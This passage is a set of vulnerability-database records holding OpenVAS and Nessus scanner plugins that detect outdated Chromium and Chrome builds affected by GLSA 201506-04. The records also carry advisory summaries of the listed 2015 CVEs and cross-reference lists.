{"id": "OPENVAS:1361412562310121381", "type": "openvas", "bulletinFamily": "scanner", "title": "Gentoo Security Advisory GLSA 201506-04", "description": "Gentoo Linux Local Security Checks GLSA 201506-04", "published": "2015-09-29T00:00:00", "modified": "2018-10-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121381", "reporter": "Eero Volotinen", "references": ["https://security.gentoo.org/glsa/201506-04"], "cvelist": ["CVE-2015-1265", "CVE-2015-1247", "CVE-2015-1257", "CVE-2015-1246", "CVE-2015-1244", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1250", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1243", "CVE-2015-1252", "CVE-2015-1233", "CVE-2015-1248", "CVE-2015-1236", "CVE-2015-1256", "CVE-2015-1242", "CVE-2015-1245", "CVE-2015-1235", "CVE-2015-1237", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1238", "CVE-2015-1264", "CVE-2015-1234"], "lastseen": "2019-05-29T18:36:11", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-201504-19", "ASA-201504-2", "ASA-201504-30", "ASA-201505-14"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2015-0850"]}, {"type": "chrome", "idList": ["GCSA-2222529096158216213", "GCSA-3364801535958232235", "GCSA-519917648682114627", "GCSA-990503644729999677"]}, {"type": "cve", "idList": ["CVE-2015-1233", "CVE-2015-1234", "CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1243", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1250", "CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265", "CVE-2015-1288"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3238-1:9F70A", "DEBIAN:DSA-3238-1:B141F", "DEBIAN:DSA-3242-1:A1376", "DEBIAN:DSA-3242-1:F76F9", "DEBIAN:DSA-3267-1:32EBE", "DEBIAN:DSA-3267-1:F1492", "DEBIAN:DSA-3315-1:9DB7E", "DEBIAN:DSA-3315-1:DF83F"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2015-1233", "DEBIANCVE:CVE-2015-1234", "DEBIANCVE:CVE-2015-1235", "DEBIANCVE:CVE-2015-1236", "DEBIANCVE:CVE-2015-1237", "DEBIANCVE:CVE-2015-1238", "DEBIANCVE:CVE-2015-1240", "DEBIANCVE:CVE-2015-1241", "DEBIANCVE:CVE-2015-1242", "DEBIANCVE:CVE-2015-1243", "DEBIANCVE:CVE-2015-1244", "DEBIANCVE:CVE-2015-1245", "DEBIANCVE:CVE-2015-1246", "DEBIANCVE:CVE-2015-1247", "DEBIANCVE:CVE-2015-1248", "DEBIANCVE:CVE-2015-1250", "DEBIANCVE:CVE-2015-1251", "DEBIANCVE:CVE-2015-1252", "DEBIANCVE:CVE-2015-1253", "DEBIANCVE:CVE-2015-1254", "DEBIANCVE:CVE-2015-1255", "DEBIANCVE:CVE-2015-1256", "DEBIANCVE:CVE-2015-1257", "DEBIANCVE:CVE-2015-1258", "DEBIANCVE:CVE-2015-1259", "DEBIANCVE:CVE-2015-1260", "DEBIANCVE:CVE-2015-1262", "DEBIANCVE:CVE-2015-1263", "DEBIANCVE:CVE-2015-1264", "DEBIANCVE:CVE-2015-1265", "DEBIANCVE:CVE-2015-1288"]}, {"type": "fedora", "idList": ["FEDORA:4F29E60478E0", "FEDORA:8A9B7608B7FE", "FEDORA:C19BF612F03E"]}, {"type": "freebsd", "idList": ["210F80B9-EDE4-11E4-81C4-00262D5ED8EE", "A9D456B4-FE4C-11E4-AD15-00262D5ED8EE", "B57F690E-ECC9-11E4-876C-00262D5ED8EE"]}, {"type": "gentoo", "idList": ["GLSA-201506-04"]}, {"type": "kaspersky", "idList": ["KLA10524", "KLA10546", "KLA10567", "KLA10585"]}, {"type": "mageia", "idList": ["MGASA-2015-0141", "MGASA-2015-0164", "MGASA-2015-0182", "MGASA-2015-0235", "MGASA-2015-0249", "MGASA-2015-0288"]}, {"type": "nessus", "idList": ["8706.PASL", "8778.PASL", "8779.PASL", "8782.PASL", "DEBIAN_DSA-3238.NASL", "DEBIAN_DSA-3242.NASL", "DEBIAN_DSA-3267.NASL", "DEBIAN_DSA-3315.NASL", "FEDORA_2015-15934.NASL", "FEDORA_2015-15935.NASL", "FEDORA_2015-15936.NASL", "FREEBSD_PKG_210F80B9EDE411E481C400262D5ED8EE.NASL", "FREEBSD_PKG_A9D456B4FE4C11E4AD1500262D5ED8EE.NASL", "FREEBSD_PKG_B57F690EECC911E4876C00262D5ED8EE.NASL", "GENTOO_GLSA-201506-04.NASL", "GOOGLE_CHROME_41_0_2272_118.NASL", "GOOGLE_CHROME_42_0_2311_135.NASL", "GOOGLE_CHROME_42_0_2311_90.NASL", "GOOGLE_CHROME_43_0_2357_65.NASL", "MACOSX_GOOGLE_CHROME_41_0_2272_118.NASL", "MACOSX_GOOGLE_CHROME_42_0_2311_135.NASL", "MACOSX_GOOGLE_CHROME_42_0_2311_90.NASL", "MACOSX_GOOGLE_CHROME_43_0_2357_65.NASL", "OPENSUSE-2015-298.NASL", "OPENSUSE-2015-320.NASL", "OPENSUSE-2015-354.NASL", "OPENSUSE-2015-390.NASL", "REDHAT-RHSA-2015-0778.NASL", "REDHAT-RHSA-2015-0816.NASL", "REDHAT-RHSA-2015-0921.NASL", "REDHAT-RHSA-2015-1023.NASL", "UBUNTU_USN-2556-1.NASL", "UBUNTU_USN-2570-1.NASL", "UBUNTU_USN-2582-1.NASL", "UBUNTU_USN-2610-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310130090", "OPENVAS:1361412562310130127", "OPENVAS:1361412562310703238", "OPENVAS:1361412562310703242", "OPENVAS:1361412562310703267", "OPENVAS:1361412562310703315", "OPENVAS:1361412562310805358", "OPENVAS:1361412562310805359", "OPENVAS:1361412562310805360", "OPENVAS:1361412562310805375", "OPENVAS:1361412562310805376", "OPENVAS:1361412562310805377", "OPENVAS:1361412562310805421", "OPENVAS:1361412562310805422", "OPENVAS:1361412562310805423", "OPENVAS:1361412562310805457", "OPENVAS:1361412562310805468", "OPENVAS:1361412562310805469", "OPENVAS:1361412562310805503", "OPENVAS:1361412562310805504", "OPENVAS:1361412562310805505", "OPENVAS:1361412562310805631", "OPENVAS:1361412562310805632", "OPENVAS:1361412562310805633", "OPENVAS:1361412562310842157", "OPENVAS:1361412562310842181", "OPENVAS:1361412562310842201", "OPENVAS:1361412562310842213", "OPENVAS:1361412562310850648", "OPENVAS:1361412562310869961", "OPENVAS:1361412562310869991", "OPENVAS:703238", "OPENVAS:703242", "OPENVAS:703267", "OPENVAS:703315"]}, {"type": "osv", "idList": ["OSV:DSA-3238-1", "OSV:DSA-3242-1", "OSV:DSA-3267-1", "OSV:DSA-3315-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139874"]}, {"type": "redhat", "idList": ["RHSA-2015:0778", "RHSA-2015:0816", "RHSA-2015:0921", "RHSA-2015:1023"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31983", "SECURITYVULNS:DOC:31999", "SECURITYVULNS:DOC:32136", "SECURITYVULNS:DOC:32351", "SECURITYVULNS:VULN:14346", "SECURITYVULNS:VULN:14435"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2015:0682-1"]}, {"type": "thn", "idList": ["THN:5567C5205B537235576972984F283879"]}, {"type": "threatpost", "idList": ["THREATPOST:45D2D399F79C59D30CB09CDC7A87747D", "THREATPOST:9A58ECA2DAAEE4EA3304CFA18B16F775"]}, {"type": "ubuntu", "idList": ["USN-2556-1", "USN-2570-1", "USN-2582-1", "USN-2610-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-1233", "UB:CVE-2015-1234", "UB:CVE-2015-1235", "UB:CVE-2015-1236", "UB:CVE-2015-1237", "UB:CVE-2015-1238", "UB:CVE-2015-1240", "UB:CVE-2015-1241", "UB:CVE-2015-1242", "UB:CVE-2015-1243", "UB:CVE-2015-1244", "UB:CVE-2015-1245", "UB:CVE-2015-1246", "UB:CVE-2015-1247", "UB:CVE-2015-1248", "UB:CVE-2015-1250", "UB:CVE-2015-1251", "UB:CVE-2015-1252", "UB:CVE-2015-1253", "UB:CVE-2015-1254", "UB:CVE-2015-1255", "UB:CVE-2015-1256", "UB:CVE-2015-1257", "UB:CVE-2015-1258", "UB:CVE-2015-1259", "UB:CVE-2015-1260", "UB:CVE-2015-1262", "UB:CVE-2015-1263", "UB:CVE-2015-1264", "UB:CVE-2015-1265", "UB:CVE-2015-1288"]}, {"type": "zdi", "idList": ["ZDI-15-137", "ZDI-15-236"]}, {"type": "zdt", "idList": ["1337DAY-ID-23663", "1337DAY-ID-24047", "1337DAY-ID-26408"]}]}, "score": {"value": -0.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "chrome", "idList": ["GCSA-2222529096158216213"]}, {"type": "cve", "idList": ["CVE-2015-1233", "CVE-2015-1234", "CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1243", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1250", "CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3242-1:F76F9"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2015-1235", "DEBIANCVE:CVE-2015-1246", "DEBIANCVE:CVE-2015-1250"]}, {"type": "fedora", "idList": ["FEDORA:8A9B7608B7FE"]}, {"type": "freebsd", "idList": ["B57F690E-ECC9-11E4-876C-00262D5ED8EE"]}, {"type": "gentoo", "idList": ["GLSA-201506-04"]}, {"type": "kaspersky", "idList": ["KLA10585"]}, {"type": "nessus", "idList": ["8778.PASL", "DEBIAN_DSA-3267.NASL", "GOOGLE_CHROME_42_0_2311_135.NASL", "MACOSX_GOOGLE_CHROME_42_0_2311_135.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310703242", "OPENVAS:1361412562310805358"]}, {"type": "redhat", "idList": ["RHSA-2015:0816", "RHSA-2015:1023"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31983", "SECURITYVULNS:VULN:14435"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2015:0682-1"]}, {"type": "thn", "idList": ["THN:5567C5205B537235576972984F283879"]}, {"type": "ubuntu", "idList": ["USN-2570-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-1240"]}, {"type": "zdi", "idList": ["ZDI-15-236"]}, {"type": "zdt", "idList": ["1337DAY-ID-23663"]}]}, "exploitation": null, "vulnersScore": -0.0}, "pluginID": "1361412562310121381", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201506-04.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121381\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:51 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201506-04\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Chromium. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201506-04\");\n script_cve_id(\"CVE-2015-1233\", \"CVE-2015-1234\", \"CVE-2015-1235\", \"CVE-2015-1236\", \"CVE-2015-1237\", \"CVE-2015-1238\", \"CVE-2015-1240\", \"CVE-2015-1241\", \"CVE-2015-1242\", \"CVE-2015-1243\", \"CVE-2015-1244\", \"CVE-2015-1245\", \"CVE-2015-1246\", \"CVE-2015-1247\", \"CVE-2015-1248\", \"CVE-2015-1250\", \"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\", \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\", \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1262\", \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201506-04\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-client/chromium\", unaffected: make_list(\"ge 43.0.2357.65\"), vulnerable: make_list(\"lt 43.0.2357.65\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "naslFamily": "Gentoo Local Security Checks", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659998956, "score": 1659840693}, "_internal": {"score_hash": "83cdcd2daf7e341b06a82ba22a94a46a"}}
{"nessus": [{"lastseen": "2021-08-19T12:45:31", "description": "The remote host is affected by the vulnerability described in GLSA-201506-04 (Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker can cause arbitrary remote code execution, Denial of Service or bypass of security mechanisms.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2015-06-23T00:00:00", "type": "nessus", "title": "GLSA-201506-04 : Chromium: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234", "CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1243", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1250", "CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201506-04.NASL", "href": "https://www.tenable.com/plugins/nessus/84332", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201506-04.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84332);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1233\", \"CVE-2015-1234\", \"CVE-2015-1235\", \"CVE-2015-1236\", \"CVE-2015-1237\", \"CVE-2015-1238\", \"CVE-2015-1240\", \"CVE-2015-1241\", \"CVE-2015-1242\", \"CVE-2015-1243\", \"CVE-2015-1244\", \"CVE-2015-1245\", \"CVE-2015-1246\", \"CVE-2015-1247\", \"CVE-2015-1248\", \"CVE-2015-1250\", \"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\", \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\", \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1262\", \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n script_bugtraq_id(73484, 73486, 74165, 74389, 74723, 74727);\n script_xref(name:\"GLSA\", value:\"201506-04\");\n\n script_name(english:\"GLSA-201506-04 : Chromium: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201506-04\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker can cause arbitrary remote code execution, Denial of\n Service or bypass of security mechanisms.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201506-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-43.0.2357.65'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 43.0.2357.65\"), vulnerable:make_list(\"lt 43.0.2357.65\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:56:21", "description": "The version of Google Chrome installed on the remote Windows host is prior to 43.0.2357.65. It is, therefore, affected by multiple vulnerabilities :\n\n - A Use-after-free memory error exists in the SpeechRecognitionClient implementation that allows remote attackers, using a crafted document, to execute arbitrary code. (CVE-2015-1251)\n\n - The Write() and DoWrite() methods of the class PartialCircularBuffer do not properly handle wraps.\n A remote attacker, by using write operations with a large amount of data, can exploit this to bypass the sandbox protection or cause a denial of service.\n (CVE-2015-1252)\n\n - The DOM implementation in Blink does not properly handle SCRIPT elements during adjustment of DOM node locations. A remote attacker, using crafted JavaScript code that appends a child to a SCRIPT element, can exploit this flaw to bypass the same origin policy.\n (CVE-2015-1253)\n\n - The 'core/dom/Document.cpp' in Blink enables the inheritance of the 'designMode' attribute. A remote attacker, using a crafted web page, can utilize this to bypass the same origin policy via the availability of editing. (CVE-2015-1254)\n\n - A use-after-free memory error exists in the WebAudio implementation when handling the stop action for an audio track. A remote attacker can exploit this to cause a denial of service or possibly execute arbitrary code. (CVE-2015-1255)\n\n - A use-after-free memory error exists in the SVG implementation in Blink, related to the improper handling of a shadow tree for a use element. A remote attacker, using a crafted document, can exploit this to cause a denial of service or possibly execute arbitrary code. (CVE-2015-1256)\n\n - The SVG implementation in Blink does not properly handle an insufficient number of values in an feColorMatrix filter. A remote attacker, using a crafted document, can exploit this to cause a denial of service via a container overflow. (CVE-2015-1257)\n\n - The libvpx library code was not compiled with an appropriate '--size-limit' value. This allows a remote attacker, using a crafted frame size in VP9 video data, to trigger a negative value for a size field, thus causing a denial of service or possibly having other impact. (CVE-2015-1258)\n\n - Google PDFium does not properly initialize memory. A remote attacker can exploit this to cause a denial of service or possibly have other unspecified impact.\n (CVE-2015-1259)\n\n - Multiple use-after-free memory errors exist the WebRTC implementation. A remote attacker can exploit these, by using a crafted JavaScript code that executes upon completion of a getUserMedia request, to cause a denial of service or possibly have other unspecified impact.\n (CVE-2015-1260)\n\n - The file 'HarfBuzzShaper.cpp' in Blink does not properly initialize a certain width field. A remote attacker, using crafted Unicode text, can exploit this to cause a denial of service or have other unspecified impact.\n (CVE-2015-1262)\n\n - The Spellcheck API implementation does not use an HTTPS session for downloading a Hunspell dictionary. A man-in-the-middle attacker, using a crafted file, can exploit this flaw to deliver incorrect spelling suggestions or possibly have other unspecified impact.\n (CVE-2015-1263)\n\n - A cross-site scripting (XSS) vulnerability exists that is related to the Bookmarks feature. A remote attacker, using crafted data, can exploit this to inject arbitrary web script or HTML. (CVE-2015-1264)\n\n - Multiple unspecified vulnerabilities exist that allow an attacker to cause a denial of service or possibly have other impact via unknown vectors. (CVE-2015-1265)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-21T00:00:00", "type": "nessus", "title": "Google Chrome < 43.0.2357.65 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_43_0_2357_65.NASL", "href": "https://www.tenable.com/plugins/nessus/83745", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83745);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2015-1251\",\n \"CVE-2015-1252\",\n \"CVE-2015-1253\",\n \"CVE-2015-1254\",\n \"CVE-2015-1255\",\n \"CVE-2015-1256\",\n \"CVE-2015-1257\",\n \"CVE-2015-1258\",\n \"CVE-2015-1259\",\n \"CVE-2015-1260\",\n \"CVE-2015-1262\",\n \"CVE-2015-1263\",\n \"CVE-2015-1264\",\n \"CVE-2015-1265\"\n );\n script_bugtraq_id(74723, 74727);\n\n script_name(english:\"Google Chrome < 43.0.2357.65 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 43.0.2357.65. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A Use-after-free memory error exists in the\n SpeechRecognitionClient implementation that allows\n remote attackers, using a crafted document, to execute\n arbitrary code. (CVE-2015-1251)\n\n - The Write() and DoWrite() methods of the class\n PartialCircularBuffer do not properly handle wraps.\n A remote attacker, by using write operations with a\n large amount of data, can exploit this to bypass the\n sandbox protection or cause a denial of service.\n (CVE-2015-1252)\n\n - The DOM implementation in Blink does not properly\n handle SCRIPT elements during adjustment of DOM node\n locations. A remote attacker, using crafted JavaScript\n code that appends a child to a SCRIPT element, can\n exploit this flaw to bypass the same origin policy.\n (CVE-2015-1253)\n\n - The 'core/dom/Document.cpp' in Blink enables the\n inheritance of the 'designMode' attribute. A remote\n attacker, using a crafted web page, can utilize this to\n bypass the same origin policy via the availability of\n editing. (CVE-2015-1254)\n\n - A use-after-free memory error exists in the WebAudio\n implementation when handling the stop action for an\n audio track. A remote attacker can exploit this to\n cause a denial of service or possibly execute\n arbitrary code. (CVE-2015-1255)\n\n - A use-after-free memory error exists in the SVG\n implementation in Blink, related to the improper\n handling of a shadow tree for a use element. A remote\n attacker, using a crafted document, can exploit this\n to cause a denial of service or possibly execute\n arbitrary code. (CVE-2015-1256)\n\n - The SVG implementation in Blink does not properly handle\n an insufficient number of values in an feColorMatrix\n filter. A remote attacker, using a crafted document, can\n exploit this to cause a denial of service via a\n container overflow. (CVE-2015-1257)\n\n - The libvpx library code was not compiled with an\n appropriate '--size-limit' value. This allows a remote\n attacker, using a crafted frame size in VP9 video data,\n to trigger a negative value for a size field, thus\n causing a denial of service or possibly having other\n impact. (CVE-2015-1258)\n\n - Google PDFium does not properly initialize memory. A\n remote attacker can exploit this to cause a denial of\n service or possibly have other unspecified impact.\n (CVE-2015-1259)\n\n - Multiple use-after-free memory errors exist the WebRTC\n implementation. A remote attacker can exploit these, by\n using a crafted JavaScript code that executes upon\n completion of a getUserMedia request, to cause a denial\n of service or possibly have other unspecified impact.\n (CVE-2015-1260)\n\n - The file 'HarfBuzzShaper.cpp' in Blink does not properly\n initialize a certain width field. A remote attacker,\n using crafted Unicode text, can exploit this to cause a\n denial of service or have other unspecified impact.\n (CVE-2015-1262)\n\n - The Spellcheck API implementation does not use an HTTPS\n session for downloading a Hunspell dictionary. A\n man-in-the-middle attacker, using a crafted file, can\n exploit this flaw to deliver incorrect spelling\n suggestions or possibly have other unspecified impact.\n (CVE-2015-1263)\n\n - A cross-site scripting (XSS) vulnerability exists that\n is related to the Bookmarks feature. A remote attacker,\n using crafted data, can exploit this to inject arbitrary\n web script or HTML. (CVE-2015-1264)\n\n - Multiple unspecified vulnerabilities exist that allow an\n attacker to cause a denial of service or possibly have\n other impact via unknown vectors. (CVE-2015-1265)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2015/05/stable-channel-update_19.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9eefd81\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 43.0.2357.65 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-1265\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 